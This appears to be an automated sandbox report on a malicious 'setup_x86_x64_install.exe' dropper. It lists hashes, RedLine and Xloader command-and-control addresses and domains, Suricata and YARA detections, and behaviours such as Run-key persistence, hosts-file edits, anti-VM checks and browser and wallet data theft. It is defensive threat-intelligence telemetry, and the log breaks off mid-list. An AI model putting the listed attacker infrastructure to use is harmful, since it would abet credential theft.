Resubmissions
30-10-2021 19:59
211030-yqs94acafr 1030-10-2021 19:47
211030-yhtkwscafm 1030-10-2021 18:51
211030-xhyzyacabn 1030-10-2021 08:53
211030-ktb84abdfp 10Analysis
-
max time kernel
639s -
max time network
4465s -
platform
windows11_x64 -
resource
win11 -
submitted
30-10-2021 19:47
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win11
Behavioral task
behavioral2
Sample
setup_x86_x64_install.exe
Resource
win10-en-20211014
General
-
Target
setup_x86_x64_install.exe
-
Size
4.2MB
-
MD5
2c1278bdd864323e17dd46c7774e0d08
-
SHA1
4e03a5d24d1d6ed106320778e9135b88f27ecfbe
-
SHA256
a5e44dd81280a7fbef17c18e528c9df4b1289144fbc107d011af282a69cc3062
-
SHA512
82a1d89e0692e8037563c92c834a3e3181b52c4423d8d6d860d31d56ef2a3c12083f8ddcc0e058ba7119a7c636938be963c70a14bdc276495e1b1b630ceddd25
Malware Config
Extracted
redline
srtupdate33
135.181.129.119:4805
Extracted
xloader
2.5
s0iw
http://www.kyiejenner.com/s0iw/
ortopediamodelo.com
orimshirts.store
universecatholicweekly.info
yvettechan.com
sersaudavelsempre.online
face-booking.net
europeanretailgroup.com
umofan.com
roemahbajumuslim.online
joyrosecuisine.net
3dmaker.house
megdb.xyz
stereoshopie.info
gv5rm.com
tdc-trust.com
mcglobal.club
choral.works
onlineconsultantgroup.com
friscopaintandbody.com
midwestii.com
weespiel.com
babyshell.be
gwynora.com
talkthered.com
f-punk.com
frankmatlock.com
clique-solicite.net
clientloyaltysystem.com
worldbyduco.com
kampfsport-erfurt.com
adndpanel.xyz
rocknfamily.net
ambr-creative.com
wwwks8829.com
thuexegiarehcmgoviet.com
brentmurrell.art
wolf-yachts.com
tenpobiz.com
binnamall.com
crestamarti.quest
terry-hitchcock.com
ocreverseteam.com
taxwarehouse2.xyz
megawholesalesystem.com
epstein-advisory.com
enewlaunches.com
iphone13.community
pianostands.com
newspaper.clinic
alamdave.com
costalitaestepona2d.com
arbacan.com
horikoshi-online-tutoring.net
missingthered.com
ecmcenterprises.com
giaohangtietkiemhcm.com
universidademackenzie.com
kveupcsmimli.mobi
ibellex.com
ikigaiofficial.store
jerseyboysnorfolk.com
xiamensaikang.com
lmnsky.com
bra866.com
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/3060-311-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral1/memory/3060-308-0x0000000000000000-mapping.dmp family_redline -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01e3b3e0fa80800c.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\Sat01e3b3e0fa80800c.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 37 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exefoldershare.exeWerFault.exeWerFault.exeWerFault.exemshta.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription pid process target process PID 3956 created 1596 3956 WerFault.exe Sat01e3b3e0fa80800c.exe PID 5140 created 5012 5140 WerFault.exe Sat01866e4ba0024d.exe PID 6228 created 2188 6228 WerFault.exe Sat01c0e0d4fbb2ea73.exe PID 6452 created 588 6452 WerFault.exe Sat0119f3e03c741b02f.exe PID 6660 created 5964 6660 WerFault.exe 1067.exe PID 1468 created 3288 1468 WerFault.exe kl8sNYvH953ODyX689F8z9zN.exe PID 6060 created 3812 6060 WerFault.exe 6.exe PID 6696 created 2516 6696 foldershare.exe uq_vDsUd_krUqeSYeUXPfpn7.tmp PID 2104 created 6816 2104 WerFault.exe cmd.exe PID 1952 created 5516 1952 WerFault.exe SolUXd1c40w2DqWZtvNdMZxs.exe PID 6044 created 5268 6044 WerFault.exe 3sZAbBc0ZCBi_e8zV7ZuDvTL.exe PID 6768 created 5368 6768 mshta.exe msedge.exe PID 6112 created 1636 6112 WerFault.exe 0aGYt0jDJJ7fYapPkZzf1Us9.exe PID 1888 created 5476 1888 WerFault.exe 1067.exe PID 6104 created 4460 6104 WerFault.exe gevrmQL0B4tD_i2ekUSkJq_0.exe PID 4872 created 5856 4872 WerFault.exe setup.exe PID 1492 created 5772 1492 WerFault.exe Soft1WW01.exe PID 5124 created 5044 5124 WerFault.exe build.exe PID 932 created 2196 932 WerFault.exe tQHJh4kJi8M3Hs2e9XPGcZue.exe PID 3404 created 960 3404 WerFault.exe VSEpxIrnTzVwh6FUu92XjrEG.exe PID 1984 created 4936 1984 WerFault.exe D18fZksnEpyQMkyslyXdHEnd.exe PID 4308 created 1488 4308 WerFault.exe Gcgaq2iYSkgHI5IxJUco2ilG.exe PID 5300 created 5712 5300 WerFault.exe 1CAHrufhJbYSm8quK5_Pt3Hd.exe PID 4748 created 4808 4748 WerFault.exe 875E.exe PID 13444 created 9100 13444 WerFault.exe gcleaner.exe PID 14140 created 9684 14140 WerFault.exe GcleanerEU.exe PID 14636 created 10716 14636 WerFault.exe GcleanerEU.exe PID 15544 created 9996 15544 WerFault.exe 86BF.exe PID 16868 created 12520 16868 WerFault.exe gcleaner.exe PID 17204 created 13316 17204 WerFault.exe GcleanerEU.exe PID 17344 created 13492 17344 WerFault.exe GcleanerEU.exe PID 18496 created 16964 18496 WerFault.exe evil_00000461748.exe PID 1524 created 15060 1524 WerFault.exe gcleaner.exe PID 3412 created 15696 3412 WerFault.exe gcleaner.exe PID 8100 created 15484 8100 WerFault.exe 7FAA.exe PID 8 created 17540 8 WerFault.exe 154de2777e56314fc82ddac571ee3af0309b601a_2021-10-30_13-10.exe PID 9304 created 15968 9304 WerFault.exe 948C.exe -
suricata: ET MALWARE FormBook CnC Checkin (GET)
suricata: ET MALWARE FormBook CnC Checkin (GET)
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Xloader Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/7044-556-0x0000000002D10000-0x0000000002D39000-memory.dmp xloader behavioral1/memory/6832-576-0x0000000002620000-0x0000000002649000-memory.dmp xloader -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\libstdc++-6.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zSCA1B22C3\libstdc++-6.dll aspack_v212_v242 -
Adds policy Run key to start application 2 TTPs 2 IoCs
Processes:
wscript.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run wscript.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\XBRXMZIX3 = "C:\\Program Files (x86)\\Eatbxn\\ThumbCachefjy.exe" wscript.exe -
Blocklisted process makes network request 7 IoCs
Processes:
mshta.exepowershell.exeMsiExec.exeflow pid process 216 4384 mshta.exe 474 2896 powershell.exe 510 2896 powershell.exe 512 2896 powershell.exe 519 2896 powershell.exe 934 16176 MsiExec.exe 1091 16176 MsiExec.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 5 IoCs
Processes:
WerFault.exeShareFolder.exeShareFolder.exeShareFolder.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\drivers\etc\hosts WerFault.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ShareFolder.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ShareFolder.exe File opened for modification C:\Windows\system32\drivers\etc\hosts ShareFolder.exe File opened for modification C:\Windows\system32\drivers\etc\hosts powershell.exe -
Executes dropped EXE 64 IoCs
Processes:
setup_installer.exesetup_install.exeSat01866e4ba0024d.exeSat016e74da9cbf1.exeSat0188dba58af938.exeSat01d42d6cf82db.exeSat01b537da2e0af175a.exeSat01e3b3e0fa80800c.exeSat01688f54435b6.exeSat01c0e0d4fbb2ea73.exeSat01f932a994dbc6.exeSat01c5002407.exeSat0119f3e03c741b02f.exeSat01519886887.exelvJ1Y9rsF3mHa5_BNzaFz0_L.exeSat018ad0a25a7faa.tmpSat01f932a994dbc6.exeSat018ad0a25a7faa.exeSat018ad0a25a7faa.tmpSat01d42d6cf82db.exelvJ1Y9rsF3mHa5_BNzaFz0_L.exeLzmwAqmV.exeSat01d42d6cf82db.exeBBIOHV.eXEChrome5.exeDownFlSetup110.exepostback.exeinst1.exeSoft1WW01.exe1067.exe5.exeCHjg5Y_u54NbfvxUap_GN9hB.exe0aGYt0jDJJ7fYapPkZzf1Us9.exe3sZAbBc0ZCBi_e8zV7ZuDvTL.exeRRcAmuN6urmWmx05CiuVFqIl.exekl8sNYvH953ODyX689F8z9zN.exeoiDNgvkGRj0prd4u1AFHb_VU.exeL1MX6UmtRLpjxdXrFidSdrC_.exemshta.exezAxe7U5Ivhp5NRRY4S8viu_q.exelgn2jnMR3V1GyJteBmyhVbIn.exe13bpu9cGZVQ3bQBYByHDZulD.exexHi60jdyEGDpMH1FO5p87jsK.exeSolUXd1c40w2DqWZtvNdMZxs.exemUWMZpz81mXRuU24Z6aKAGGB.exe1067.exeTMnzDfTlwNkK30H06E1jeF_8.exegevrmQL0B4tD_i2ekUSkJq_0.exeConhost.exeuq_vDsUd_krUqeSYeUXPfpn7.tmprzFPMen3odIYaTyH172kj3IK.exeWerFault.exe4ujWsOfWNHyu9F9f_UNQytd8.exedkXwYYim4MBaHXEPgI2496RO.exe427k7GX7zKXCwdsG204Llusg.exemsedge.exelgn2jnMR3V1GyJteBmyhVbIn.exen4vMR6ebgJAxlDmOyMAhNupH.exejg1_1faf.executm3.exesetup.exe6_pV7UATkHEXMa9PhaA18ifX.exechenxiulan-game.exepid process 428 setup_installer.exe 1448 setup_install.exe 5012 Sat01866e4ba0024d.exe 3388 Sat016e74da9cbf1.exe 720 Sat0188dba58af938.exe 4384 Sat01d42d6cf82db.exe 3160 Sat01b537da2e0af175a.exe 1596 Sat01e3b3e0fa80800c.exe 3216 Sat01688f54435b6.exe 2188 Sat01c0e0d4fbb2ea73.exe 3860 Sat01f932a994dbc6.exe 852 Sat01c5002407.exe 588 Sat0119f3e03c741b02f.exe 4520 Sat01519886887.exe 876 lvJ1Y9rsF3mHa5_BNzaFz0_L.exe 2876 Sat018ad0a25a7faa.tmp 1576 Sat01f932a994dbc6.exe 3372 Sat018ad0a25a7faa.exe 3336 Sat018ad0a25a7faa.tmp 4468 Sat01d42d6cf82db.exe 876 lvJ1Y9rsF3mHa5_BNzaFz0_L.exe 5128 lvJ1Y9rsF3mHa5_BNzaFz0_L.exe 5184 LzmwAqmV.exe 3060 Sat01d42d6cf82db.exe 5216 BBIOHV.eXE 5588 Chrome5.exe 5652 DownFlSetup110.exe 5684 postback.exe 5700 inst1.exe 5772 Soft1WW01.exe 5964 1067.exe 6136 5.exe 3152 CHjg5Y_u54NbfvxUap_GN9hB.exe 1636 0aGYt0jDJJ7fYapPkZzf1Us9.exe 5268 3sZAbBc0ZCBi_e8zV7ZuDvTL.exe 5296 RRcAmuN6urmWmx05CiuVFqIl.exe 3288 kl8sNYvH953ODyX689F8z9zN.exe 4208 oiDNgvkGRj0prd4u1AFHb_VU.exe 5276 L1MX6UmtRLpjxdXrFidSdrC_.exe 4384 mshta.exe 3160 zAxe7U5Ivhp5NRRY4S8viu_q.exe 3504 lgn2jnMR3V1GyJteBmyhVbIn.exe 4200 13bpu9cGZVQ3bQBYByHDZulD.exe 5472 xHi60jdyEGDpMH1FO5p87jsK.exe 5516 SolUXd1c40w2DqWZtvNdMZxs.exe 5536 mUWMZpz81mXRuU24Z6aKAGGB.exe 5476 1067.exe 4520 TMnzDfTlwNkK30H06E1jeF_8.exe 4460 gevrmQL0B4tD_i2ekUSkJq_0.exe 5756 Conhost.exe 2516 uq_vDsUd_krUqeSYeUXPfpn7.tmp 1200 rzFPMen3odIYaTyH172kj3IK.exe 1492 WerFault.exe 5616 4ujWsOfWNHyu9F9f_UNQytd8.exe 5508 dkXwYYim4MBaHXEPgI2496RO.exe 6128 427k7GX7zKXCwdsG204Llusg.exe 5368 msedge.exe 4968 lgn2jnMR3V1GyJteBmyhVbIn.exe 4596 n4vMR6ebgJAxlDmOyMAhNupH.exe 5880 jg1_1faf.exe 5020 cutm3.exe 5856 setup.exe 6504 6_pV7UATkHEXMa9PhaA18ifX.exe 6524 chenxiulan-game.exe -
Sets service image path in registry 2 TTPs
-
Checks BIOS information in registry 2 TTPs 32 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
6431454.exe30.10.21_.exe2957429.exeConhost.exeevil_00000461748.exekl8sNYvH953ODyX689F8z9zN.exe427k7GX7zKXCwdsG204Llusg.exemUWMZpz81mXRuU24Z6aKAGGB.exerzFPMen3odIYaTyH172kj3IK.exe4ujWsOfWNHyu9F9f_UNQytd8.exeoiDNgvkGRj0prd4u1AFHb_VU.exe2775016.exe4044792.exe4252378.exe2626800.exe62FA.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6431454.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 30.10.21_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2957429.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6431454.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion evil_00000461748.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion kl8sNYvH953ODyX689F8z9zN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 427k7GX7zKXCwdsG204Llusg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 427k7GX7zKXCwdsG204Llusg.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mUWMZpz81mXRuU24Z6aKAGGB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rzFPMen3odIYaTyH172kj3IK.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4ujWsOfWNHyu9F9f_UNQytd8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion oiDNgvkGRj0prd4u1AFHb_VU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2775016.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4044792.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4252378.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 30.10.21_.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rzFPMen3odIYaTyH172kj3IK.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion oiDNgvkGRj0prd4u1AFHb_VU.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2775016.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4044792.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion kl8sNYvH953ODyX689F8z9zN.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2626800.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4252378.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2626800.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mUWMZpz81mXRuU24Z6aKAGGB.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 62FA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 62FA.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion evil_00000461748.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2957429.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4ujWsOfWNHyu9F9f_UNQytd8.exe -
Loads dropped DLL 64 IoCs
Processes:
setup_install.exeSat018ad0a25a7faa.tmpSat018ad0a25a7faa.tmp6_pV7UATkHEXMa9PhaA18ifX.tmpuq_vDsUd_krUqeSYeUXPfpn7.exeCalculator Installation.exerundll32.exesetup.exey1NMjVm7jOPRU0QAYN13s4DO.exeuq_vDsUd_krUqeSYeUXPfpn7.tmpkXBPRmvwpAukkEMWW9KDPQq0.tmpDDGFmreAmRulc0y2ma2a3Jpw.exeWerFault.exeSyxkHG6xCsgdmnepicLocJDL.tmpsetup.exemsiexec.exeregsvr32.exesetup.exesetting.exeinstaller.exeautosubplayer.exeMsiExec.exeMsiExec.exeautosubplayer.exepid process 1448 setup_install.exe 1448 setup_install.exe 1448 setup_install.exe 1448 setup_install.exe 1448 setup_install.exe 1448 setup_install.exe 2876 Sat018ad0a25a7faa.tmp 3336 Sat018ad0a25a7faa.tmp 6952 6_pV7UATkHEXMa9PhaA18ifX.tmp 7156 uq_vDsUd_krUqeSYeUXPfpn7.exe 7156 uq_vDsUd_krUqeSYeUXPfpn7.exe 6156 Calculator Installation.exe 6156 Calculator Installation.exe 6156 Calculator Installation.exe 6156 Calculator Installation.exe 6156 Calculator Installation.exe 7156 uq_vDsUd_krUqeSYeUXPfpn7.exe 7156 uq_vDsUd_krUqeSYeUXPfpn7.exe 7156 uq_vDsUd_krUqeSYeUXPfpn7.exe 7156 uq_vDsUd_krUqeSYeUXPfpn7.exe 7156 uq_vDsUd_krUqeSYeUXPfpn7.exe 7156 uq_vDsUd_krUqeSYeUXPfpn7.exe 7156 uq_vDsUd_krUqeSYeUXPfpn7.exe 1400 rundll32.exe 1400 rundll32.exe 2216 setup.exe 2216 setup.exe 4908 y1NMjVm7jOPRU0QAYN13s4DO.exe 4908 y1NMjVm7jOPRU0QAYN13s4DO.exe 2516 uq_vDsUd_krUqeSYeUXPfpn7.tmp 7076 kXBPRmvwpAukkEMWW9KDPQq0.tmp 4908 y1NMjVm7jOPRU0QAYN13s4DO.exe 1116 DDGFmreAmRulc0y2ma2a3Jpw.exe 1116 DDGFmreAmRulc0y2ma2a3Jpw.exe 1524 WerFault.exe 6856 SyxkHG6xCsgdmnepicLocJDL.tmp 4908 y1NMjVm7jOPRU0QAYN13s4DO.exe 4908 y1NMjVm7jOPRU0QAYN13s4DO.exe 4908 y1NMjVm7jOPRU0QAYN13s4DO.exe 4908 y1NMjVm7jOPRU0QAYN13s4DO.exe 1116 DDGFmreAmRulc0y2ma2a3Jpw.exe 4676 setup.exe 4676 setup.exe 1116 DDGFmreAmRulc0y2ma2a3Jpw.exe 1116 DDGFmreAmRulc0y2ma2a3Jpw.exe 1116 DDGFmreAmRulc0y2ma2a3Jpw.exe 1116 DDGFmreAmRulc0y2ma2a3Jpw.exe 3952 msiexec.exe 3952 msiexec.exe 6616 regsvr32.exe 3044 setup.exe 3044 setup.exe 8368 setting.exe 9392 installer.exe 9392 installer.exe 10012 autosubplayer.exe 9392 installer.exe 12560 MsiExec.exe 12560 MsiExec.exe 12808 MsiExec.exe 10012 autosubplayer.exe 12808 MsiExec.exe 13528 autosubplayer.exe 2216 setup.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 13 IoCs
Processes:
setup.exesetup.exeaipackagechainer.exeWerFault.exeShareFolder.exemsedge.exesetup.exe1067.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\ aipackagechainer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Company\\Cyxezhajaema.exe\"" WerFault.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\MSBuild\\Momyneheqi.exe\"" ShareFolder.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\MicrosoftEdgeAutoLaunch_5EFC0ECB77A7585FE9DCDD0B2E946A2B = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --no-startup-window /prefetch:5" msedge.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Calculator = "C:\\Users\\Admin\\AppData\\Roaming\\Calculator\\Calculator.exe --iUSIg" setup.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run aipackagechainer.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe" 1067.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run msedge.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run setup.exe -
Checks for any installed AV software in registry 1 TTPs 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe Key opened \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\SOFTWARE\KasperskyLab powershell.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
2626800.exe2775016.exe62FA.exe30.10.21_.exe2957429.exerzFPMen3odIYaTyH172kj3IK.exe6431454.exeevil_00000461748.exe4ujWsOfWNHyu9F9f_UNQytd8.exeoiDNgvkGRj0prd4u1AFHb_VU.exe4252378.exejg1_1faf.exekl8sNYvH953ODyX689F8z9zN.exe427k7GX7zKXCwdsG204Llusg.exemUWMZpz81mXRuU24Z6aKAGGB.exe4044792.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2626800.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2775016.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 62FA.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 30.10.21_.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2957429.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA rzFPMen3odIYaTyH172kj3IK.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6431454.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA evil_00000461748.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4ujWsOfWNHyu9F9f_UNQytd8.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA oiDNgvkGRj0prd4u1AFHb_VU.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4252378.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jg1_1faf.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA kl8sNYvH953ODyX689F8z9zN.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 427k7GX7zKXCwdsG204Llusg.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mUWMZpz81mXRuU24Z6aKAGGB.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4044792.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
installer.exemsiexec.exesetting.exedescription ioc process File opened (read-only) \??\W: installer.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\G: installer.exe File opened (read-only) \??\L: installer.exe File opened (read-only) \??\M: installer.exe File opened (read-only) \??\N: installer.exe File opened (read-only) \??\T: installer.exe File opened (read-only) \??\U: installer.exe File opened (read-only) \??\X: installer.exe File opened (read-only) \??\G: setting.exe File opened (read-only) \??\R: setting.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\F: installer.exe File opened (read-only) \??\I: installer.exe File opened (read-only) \??\S: installer.exe File opened (read-only) \??\Y: setting.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: installer.exe File opened (read-only) \??\K: installer.exe File opened (read-only) \??\V: setting.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\H: installer.exe File opened (read-only) \??\J: installer.exe File opened (read-only) \??\F: setting.exe File opened (read-only) \??\S: setting.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: setting.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\V: installer.exe File opened (read-only) \??\Z: setting.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\O: installer.exe File opened (read-only) \??\Y: installer.exe File opened (read-only) \??\H: setting.exe File opened (read-only) \??\X: setting.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\P: installer.exe File opened (read-only) \??\K: setting.exe File opened (read-only) \??\N: setting.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: installer.exe File opened (read-only) \??\A: setting.exe File opened (read-only) \??\J: setting.exe File opened (read-only) \??\Q: setting.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\R: installer.exe File opened (read-only) \??\M: setting.exe File opened (read-only) \??\T: setting.exe File opened (read-only) 